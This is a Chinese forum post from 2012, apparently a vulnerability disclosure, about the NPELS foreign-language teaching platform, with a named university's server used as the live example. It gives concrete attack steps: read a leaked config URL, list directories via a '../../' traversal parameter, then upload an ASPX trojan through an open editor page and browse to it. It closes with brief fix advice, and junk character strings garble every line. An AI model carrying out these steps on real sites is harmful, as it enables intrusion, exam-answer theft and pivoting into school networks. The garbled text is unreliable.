找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2143|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
+ M5 ~! D% G+ I: S3 ^$ v6 ]; ?% b) e3 R; F3 `
详细说明:
) f% [6 S- p, V7 v4 J* t5 A 0 d. f$ E8 }( Y' j
以南开大学的为例:
' E7 M2 Q+ n' b: [2 E0 U( ~http://222.30.60.3/NPELS$ n5 u! y/ I( E1 }3 l
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
3 Y9 V! k8 ^* R# L2 n/ L% I. j$ @<setting name="Update_CommonSvr_CommonService" serializeAs="String">. [+ U3 d+ [- @% s1 w8 Y5 N
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>. O- {, g% B4 z2 H0 W
</setting>
7 H  c2 q* a* p) e6 {' G7 \! w及版本号$ @7 r: H4 w( x* w. v) m! l( @, }
<add key="TVersion" value="1, 0, 0, 2187">
( W6 `3 q" O, W1 h7 J+ y1 s</add>6 _/ u; }. w! [- I' c9 q+ S$ g# A0 k
直接访问
0 U# B+ H8 {" f+ B8 Whttp://222.30.60.3/NPELS/CommonService.asmx
. @8 L, R8 O7 ~7 G使用GetTestClientFileList操作,直接 HTTP GET 列目录:6 h; S! e  x- L5 c1 c
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187+ k3 h$ m' L! ^" [& f6 v
进一步列目录(返回的网页很大,可以直接 wget 下来)
2 J1 t9 f9 B0 x, nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
- a9 a5 q& @- ~- b/ l' u7 T* D 9 P! I' M4 R7 x4 o* P" `
发现
) q- C9 u: V% E1 b+ Mhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm9 r1 g& |9 l- e8 _
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
7 Z! p" |' j2 A, A上传后继续列目录找到木马地址直接访问即可! k/ z$ K7 t9 F3 M' R0 L

* E4 |  [8 g& ~4 ^3 {3 ^OOXX
7 N4 Z3 D" `7 k( v. o, X* [ , n+ y6 }/ w( k
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
- O/ M1 X% K* q* x* C2 l漏洞证明:: w9 l/ U0 [: B
# E  o8 k5 p( R+ g& H. y
列目录:
6 s4 Z& N, q4 N! lhttp://222.30.60.3/NPELS/CommonS ... List?version=../../) b# \/ g# Z$ o" E
文件上传:! \  F4 v6 `/ Y. Y* f# ], Y/ ^
http://222.30.60.3/npelsv/editor/editor.htm
# V0 X1 r8 X3 o/ L: E+ I , F2 K" ~; L5 {" p5 j
上传木马:
1 I8 o* A: M  E3 S. t- B$ phttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
' b2 t$ V+ ^5 q: C 4 v# d( h# z. ~" V5 f* _
修复方案:4 a! X' N( d- D  u& \. o5 p; n8 u3 u/ c
好像考试系统必须使用 CommonService.asmx( I0 I+ K- S  t. z' t- k' L' C" q$ j7 ?
最好配置文件加密或者用别的方式不让它泄露出来
" k$ Z# e4 f: _3 V/ e9 Z, j并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
0 Q; j' D: m, f, n/ x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表